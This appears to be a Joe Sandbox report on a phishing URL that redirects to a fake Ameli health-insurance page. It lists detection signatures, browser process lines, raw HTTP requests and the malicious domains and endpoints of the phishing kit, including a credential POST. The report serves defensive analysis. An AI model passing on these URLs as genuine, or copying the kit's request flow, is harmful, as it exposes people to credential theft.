Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://inpzk.useringimportdulcimer.ink/?=vxkncwole9

Overview

General Information

Sample URL:https://inpzk.useringimportdulcimer.ink/?=vxkncwole9
Analysis ID:1466886
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish44
HTML page contains hidden URLs or javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1996,i,4856771794578444014,547560397401803930,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inpzk.useringimportdulcimer.ink/?=vxkncwole9" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.3.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://inpzk.useringimportdulcimer.ink/?=vxkncwole9SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

    Phishing

    barindex
    Source: https://cartevitale-ameli.santeassures-informations.euLLM: Score: 8 brands: Ameli Reasons: The URL 'cartevitale-ameli.santeassures-informations.eu' is suspicious because it uses a long and complex domain name that does not match the legitimate domain 'ameli.fr' associated with the Ameli brand. The presence of a CAPTCHA on the page is not inherently suspicious, but combined with the suspicious domain and the use of social usering techniques (such as mimicking a legitimate brand), it raises concerns. The page does not have a prominent login form, which is common in phishing sites to capture user credentials. Overall, the combination of these factors strongly suggests that this is a phishing site. DOM: 1.6.pages.csv
    Source: Yara matchFile source: 1.3.pages.csv, type: HTML
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
    Source: https://cartevitale-ameli.santeassures-informations.eu/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.htmlHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49764 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49765 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49770 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
    Source: global trafficHTTP traffic detected: GET /?=vxkncwole9 HTTP/1.1Host: inpzk.useringimportdulcimer.inkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assurance/index.html HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cartevitale-ameli.santeassures-informations.eu/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /index.php?authentification HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d6efe14aad728f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /websockets HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://cartevitale-ameli.santeassures-informations.euSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4pSec-WebSocket-Key: Hhd9qevwwo25sYWpyBkMOg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d6efe14aad728f/1720010354548/f6b3f694799fbd2dd6b2412977b9f8009ebec1e6b44163290b73627a156132ba/xjaWdIKTKn7go5y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /?js_challenge HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?iauthentification HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /?authentification&uri=/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html&search= HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /?captcha_image HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: GET /?captcha_image HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficDNS traffic detected: DNS query: inpzk.useringimportdulcimer.ink
    Source: global trafficDNS traffic detected: DNS query: cartevitale-ameli.santeassures-informations.eu
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: unknownHTTP traffic detected: POST /index.php?authentification HTTP/1.1Host: cartevitale-ameli.santeassures-informations.euConnection: keep-aliveContent-Length: 184sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWPSuNQoNtJ8oyPDVAccept: */*Origin: https://cartevitale-ameli.santeassures-informations.euSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 12:39:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: PxAK3j0SARz7bI6jhIQcLA==$0KJs0nn7MO1udhNPvfz2Jg==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d6f0079f0b41a9-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 12:39:24 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: SsK6Apw3sGoogNO2grTi1g==$t3qHip9/5g2pwWINQMOuPQ==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d6f02b7a3b0c9d-EWRalt-svc: h3=":443"; ma=86400
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
